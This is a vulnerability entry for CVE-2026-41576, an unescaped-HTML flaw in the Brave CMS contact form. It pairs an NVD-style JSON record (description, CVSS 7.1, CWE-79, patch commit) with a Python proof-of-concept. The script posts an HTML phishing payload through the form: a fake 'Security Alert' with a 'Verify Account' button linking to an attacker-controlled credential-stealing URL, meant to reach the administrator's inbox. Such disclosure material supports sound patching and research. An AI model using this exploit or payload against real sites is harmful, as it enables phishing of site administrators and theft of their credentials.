CVE-2026-41576

import requests # Target URL of the vulnerable contact form target_url = "http://target-brave-cms.com/contact" # Malicious payload simulating a phishing interface inside the email body # The payload injects a fake login form or a deceptive link html_payload = """ <div style="text-align:center; font-family: Arial;"> <h3>Security Alert: Account Verification Required</h3> <p>Please click the link below to verify your administrator account:</p> <a href="http://attacker-controlled-site.com/steal-credentials" style="background-color:#4CAF50; color:white; padding:10px; text-decoration:none;">Verify Account</a> </div> """ # Data to be sent in the POST request form_data = { "name": "Admin User", "email": "[email protected]", "message": html_payload } try: response = requests.post(target_url, data=form_data) if response.status_code == 200: print("[+] Payload sent successfully. Check administrator email for injected HTML.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

{"cve": {"id": "CVE-2026-41576", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:40.910", "lastModified": "2026-05-08T15:58:49.383", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Brave CMS is an open-source CMS. Prior to commit 6c56603, the contact form is publicly accessible (no authentication required). User-supplied message text is passed through PHP's nl2br() function, which converts newlines to <br> tags but does not escape HTML. The resulting string is then passed to a Blade email template using the unescaped {!! $msg !!} directive. The resulting content is then rendered in a Blade email template using the unescaped {!! $msg !!} directive. Because HTML is not sanitized, arbitrary markup can be injected into the email body. While modern HTML-capable email clients (Gmail or Outlook Web) typically block JavaScript execution, they still render HTML content. This allows attackers to craft convincing phishing interfaces inside the email sent to the administrator. This issue has been patched via commit 6c56603."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/Ajax30/BraveCMS-2.0/commit/6c5660373cf5f0ca9181603280427aca46ef11ea", "source": "[email protected]"}, {"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-x7cg-8grr-grvx", "source": "[email protected]"}]}}